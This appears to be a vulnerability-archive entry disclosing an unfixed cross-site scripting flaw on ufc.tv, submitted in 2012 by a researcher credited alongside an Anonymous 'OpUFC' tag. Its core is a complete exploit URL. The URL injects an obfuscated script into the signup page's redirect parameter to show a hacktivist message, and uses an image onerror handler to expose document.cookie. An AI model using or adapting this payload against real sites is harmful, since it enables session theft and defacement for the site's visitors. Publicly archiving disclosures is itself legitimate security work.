Security researcher s3rver.exe, has submitted on 27/01/2012 a cross-site-scripting (XSS) vulnerability affecting ufc.tv, which at the time of submission ranked 43184 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/02/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 27/01/2012 |
Date published: 16/02/2012 |
Fixed? Mail us! | Status: UNFIXED |
Author: s3rver.exe |
Domain: ufc.tv |
Category: XSS |
Pagerank: 43184 |
URL: https://ufc.tv/ufc/secure/signup?redirect='%22()%26%251%3CScRiPt%20%3Eprompt(%22hacked%20by%20s3rver .exe%20,%20OpUFC%20Anonymous%20CabinCr3w%22)%3C/ScRiPt%3E%3Cimg%20src=%22http://blogs-images.forbes. com/parmyolson/files/2011/08/anonymous-logo-1.jpg%22%20onerror=alert(document.cookie);%3E |
Click here to view the mirror
|
|
|